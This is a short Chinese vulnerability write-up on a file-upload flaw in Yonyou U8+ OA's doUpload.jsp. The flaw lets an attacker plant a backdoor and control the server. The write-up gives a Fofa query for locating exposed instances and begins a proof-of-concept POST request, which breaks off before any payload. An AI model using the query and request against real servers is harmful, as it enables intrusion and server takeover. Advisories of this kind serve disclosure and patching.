简介
用友U8+成长型企业互联网应用平台,为成长型企业提供预配置的最佳管理与业务实践,以企业全面精细化管理方案为核心,融入互联网时代的新兴元素:移动技术、网络营销、电子商务、体验营销,帮助企业实现产业链协同,拓展企业社交化应用,推进企业经营管理模式变革,助力企业基业长青。
漏洞描述
用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
影响范围
用友U8+ OA
Fofa:
"用友U8-OA" && body="yyoa"
漏洞复现
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (M